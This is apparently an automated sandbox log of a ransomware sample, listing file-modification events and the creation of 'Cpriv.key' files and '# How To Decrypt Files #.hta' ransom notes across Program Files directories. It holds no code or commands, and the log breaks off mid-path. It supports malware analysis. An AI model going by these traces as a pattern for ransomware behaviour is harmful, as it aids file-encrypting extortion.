de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_GreenTea.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\msadc\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Internet Explorer\SIGNUP\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Analysis Services\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\ECLIPSE\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs-nio2.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\VeriSignLogo.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\ApothecaryMergeLetter.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rss_headline_glow_docked.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_thunderstorm.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0183198.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN01165_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\dnsns.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\ViewHeaderPreview.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0284916.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_foggy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\plugin.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21433_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\EssentialReport.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145879.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata_2.2.0.v20131211-1531.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\en-US\split.avi de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\StopIconMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Basic\DEFAULT.XSL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Mail\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_fr.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00261_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-execution.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\resources\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.filesystem_1.4.100.v20140514-1614.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01586_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18238_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\DiscussionToolIconImages.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGWEBCAL.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Smart Tag\MSTAG.TLB de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.ja_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\css\slideShow.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_up.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_hail.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\common.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\SpeechEngines\Microsoft\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DATE.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-queries.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02051_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\next_hov.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationUp_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\js\settings.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00175_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN020.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\OrangeCircles.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR36F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.SG.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-core.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00222_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Biscay.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB9.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\ado\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME02.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\01_googleimage.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0240695.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18193_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_rest.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\Africa\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00272_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174315.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02450_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GrayCheck\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Things\HORN.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PROOF\MSSP7ES.LEX de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\flyout.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\cloud_Thumbnail.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-modules-profiler_visualvm.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107734.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0195384.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\VC\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_divider.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\Adobe\Help\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Adjacency.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\audiodepthconverter.ax de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL111.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsBrowserUpgrade.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Casual.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Module.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\resources\1033\Synchronization.rll de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Windows NT\TableTextService\TableTextServiceSimplifiedShuangPin.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Push\1047_576black.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\scrapbook.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSTORE_COL.HXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\FORM98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Media Renderer\DMR_48.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr\default.jfc de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR29B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0149481.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Media Player\Media Renderer\avtransport.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01772_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\IntroducingPowerPoint2010.potx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\Issues.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\d3d9\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_snow.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\To_Do_List.emf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Customer Support.fdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TAIL.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR45B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\SIDEBARVERTBB.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\Words.pdf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.jasper.glassfish_2.2.2.v201205150955.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0183172.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGNAVBAR.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color48.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03380I.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MSCOL11.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00732_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\mset7jp.kic de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Triedit\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\ado\msado28.tlb de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.SF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107130.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00911_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Garden.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk16\windows-amd64\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01173_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSACCESS.DEV_COL.HXC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\gfserrorfromgroove.ico de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00194_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_rest.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\js\RSSFeeds.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099156.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_FormsHomePage.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD 